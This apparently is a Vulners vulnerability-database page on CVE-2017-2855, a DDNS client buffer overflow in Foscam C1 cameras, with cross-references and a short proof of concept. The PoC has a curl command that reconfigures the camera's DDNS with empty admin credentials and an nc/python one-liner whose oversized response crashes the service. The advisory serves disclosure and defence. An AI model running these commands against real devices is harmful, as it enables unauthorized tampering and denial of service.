| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Foscam C1 Indoor HD Camera DDNS Client Buffer Overflow Vulnerability (CNVD-2017-34261) | 15 Nov 201700:00 | – | cnvd | |
| CVE-2017-2855 | 19 Sep 201816:00 | – | cve | |
| CVE-2017-2855 | 19 Sep 201816:00 | – | cvelist | |
| EUVD-2017-11996 | 7 Oct 202500:30 | – | euvd | |
| CVE-2017-2855 | 19 Sep 201816:29 | – | nvd | |
| CVE-2017-2855 | 19 Sep 201816:29 | – | osv | |
| Buffer overflow | 19 Sep 201816:29 | – | prion | |
| Foscam IP Video Camera webService 3322.net DDNS Client Code Execution Vulnerability | 13 Nov 201700:00 | – | talos | |
| Vulnerability Spotlight: Multiple Vulnerabilities in Foscam C1 Indoor HD Cameras | 13 Nov 201707:43 | – | talosblog |
Prerequisite for this attack is that the device is setup to use the DDNS number 2. For this, the following query can be used:
```
$ sUsr="admin"
$ sPwd=""
$ curl "http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=${sUsr}&pwd=${sPwd}&cmd=setDDNSConfig&isEnable=1&hostName=x&ddnsServer=2&user=x&password=x"
```
To trigger the vulnerability, an attacker needs to be able to intercept the device's HTTP requests and answer with a malicious payload. The following command will make the service crash.
```
$ sudo nc -l -p 80 <<< $( python2 -c 'print "200 OK\r\n\r\n"+"A"*900+"\r"' )
```
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation